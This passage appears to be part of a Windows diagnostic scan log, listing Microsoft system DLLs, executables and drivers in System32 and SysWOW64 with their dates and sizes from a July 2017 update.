C:\WINDOWS\system32\LockHostingFramework.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2017-07-11 20:54 - 2017-06-20 07:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll 2017-07-11 20:54 - 2017-06-20 07:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 07:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-07-11 20:54 - 2017-06-20 07:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2017-07-11 20:54 - 2017-06-20 07:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll 2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll 2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2017-07-11 20:54 - 2017-06-20 06:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl 2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe 2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 06:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv 2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll 2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2017-07-11 20:53 - 2017-07-07 09:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2017-07-11 20:53 - 2017-07-07 09:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll 2017-07-11 20:53 - 2017-07-07 09:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-07-11 20:53 - 2017-07-07 09:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-07-11 20:53 - 2017-07-07 09:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys 2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2017-07-11 20:53 - 2017-07-07 09:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-07-11 20:53 - 2017-07-07 09:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2017-07-11 20:53 - 2017-07-07 09:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll 2017-07-11 20:53 - 2017-07-07 09:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll 2017-07-11 20:53 - 2017-07-07 09:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2017-07-11 20:53 - 2017-07-07 09:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe 2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2017-07-11 20:53 - 2017-07-07 09:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-07-11 20:53 - 2017-07-07 09:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-07-11 20:53 - 2017-07-07 09:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll 2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-07-11 20:53 - 2017-07-07 08:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-07-11 20:53 - 2017-07-07 08:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-07-11 20:53 - 2017-07-07 08:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll 2017-07-11 20:53 - 2017-07-07 08:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll 2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll 2017-07-11 20:53 - 2017-07-07 08:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll 2017-07-11 20:53 - 2017-07-07 08:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll 2017-07-11 20:53 - 2017-07-07 08:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-07-11 20:53 - 2017-07-07 08:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-07-11 20:53 - 2017-07-07 08:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2017-07-11 20:53 - 2017-07-07 08:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe 2017-07-11 20:53 - 2017-07-07 08:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2017-07-11 20:53 - 2017-07-07 08:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-07-11 20:53 - 2017-07-07 08:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2017-07-11 20:53 - 2017-07-07 08:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-07-11 20:53 - 2017-07-07 08:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll 2017-07-11 20:53 - 2017-07-07 08:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll 2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll 2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2017-07-11 20:53 - 2017-06-20 08:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll 2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-07-11 20:53 - 2017-06-20 08:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe 2017-07-11 20:53 - 2017-06-20 08:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-07-11 20:53 - 2017-06-20 07:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2017-07-11 20:53 - 2017-06-20 07:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll 2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys 2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) 